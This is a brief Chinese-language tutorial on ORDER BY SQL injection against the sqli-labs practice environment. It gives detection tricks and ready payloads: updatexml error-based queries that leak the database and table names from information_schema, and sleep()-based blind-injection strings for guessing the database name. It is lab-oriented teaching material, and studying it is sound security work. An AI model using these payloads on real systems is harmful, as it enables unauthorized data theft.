order by 注入姿势

order by 注入原理

其实orde by 注入也是sql注入的一种,原理都一样就是mysql语法的区别,order by是用来排序的语法。

sql-lab讲解

判断方法

1.通过做运算来判断如：2-1的返回是否和1一样，和通过desc倒序，

还有排序方法判断如：if(1=1,username,password)、rand(1=1)。

sql-lab46基于order by的报错注入

?sort=1 and (updatexml(1,concat(0x7e,(select(database())),0x7e),1))
?sort=1 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))

sql-lab基于order by 时间盲注

数据库长度：?sort=1 and (if(length(database())=8,sleep(1),1))
数据库猜解：?sort=1 and (if(ascii(mid(database(),1,1))=115,sleep(1),1))